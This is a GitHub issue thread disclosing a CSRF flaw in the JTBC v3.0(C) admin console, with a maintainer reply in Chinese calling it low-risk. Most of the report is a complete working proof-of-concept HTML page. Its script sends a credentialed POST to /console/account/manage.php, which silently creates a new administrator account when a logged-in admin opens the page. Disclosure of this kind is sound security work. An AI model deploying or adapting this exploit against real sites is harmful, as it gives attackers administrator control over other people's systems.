### ISSUE TITLE
There is CSRF vulnerability that can add the administrator account

### ISSUE THREAD

**Issue by Lawlite96** [jetiben/jtbc#4]
/console/account/manage.php?type=action&action=add in JTBC v3.0(C) has CSRF,After the administrator logged in, open the csrf exp page,will be add a administrator.
csrf exp:
1.html
<!DOCTYPE html>
<html>
<head>
<title>test csrf</title>
<meta charset="utf-8">
<script type="text/javascript">
var url = "http://x.x.x.x/phpjtbc/console/account/manage.php?type=action&action=add";
var postStr='username=testcsrf&password=123456&cpassword=123456&role=-1&email=test%40test.com';
var ajax = null;
if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    ajax=null;
}
ajax.open("POST", url, false);
ajax.withCredentials = true;
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
ajax.send(postStr);
</script>
</head>
<body>
</body>
</html>

**Comment by jetiben** [comment]
谢谢您的反馈，这是一个低危的问题，我会在有时候的时候进行完善。
